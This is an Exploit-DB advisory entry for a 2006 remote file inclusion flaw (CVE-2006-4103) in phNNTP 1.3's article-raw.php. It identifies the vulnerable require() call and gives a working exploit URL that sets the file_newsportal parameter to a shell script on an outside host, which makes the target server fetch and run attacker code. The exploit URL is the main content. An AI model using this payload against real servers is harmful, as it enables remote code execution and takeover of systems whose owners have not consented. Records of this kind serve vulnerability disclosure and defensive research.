phNNTP <= 1.3 article-raw.php Remote File Include Vulnerability

2006-08-08T00:00:00
ID EDB-ID:2148
Type exploitdb
Reporter Drago84
Modified 2006-08-08T00:00:00

Description

phNNTP <= 1.3 (article-raw.php) Remote File Include Vulnerability. CVE-2006-4103. Webapps exploit for php platform

                                        
                                            phNNTP v1.3 Remote File Inclusion

CreW: ToxiC

Bug Found By Drago84

Source Code:
http://freshmeat.net/redir/phnntp/16290/url_tgz/phNNTP-v1.3.tar.gz

Problem Is:
require("$file_newsportal");

Page Affect:
article-raw.php

Path:
Declare file_newsportal

ExP:
http://www.site.com/Dir_phNNTP/article-raw.php?file_newsportal=http://www.evalsite.com/shell.php?

Greatz: Str0ke

# milw0rm.com [2006-08-08]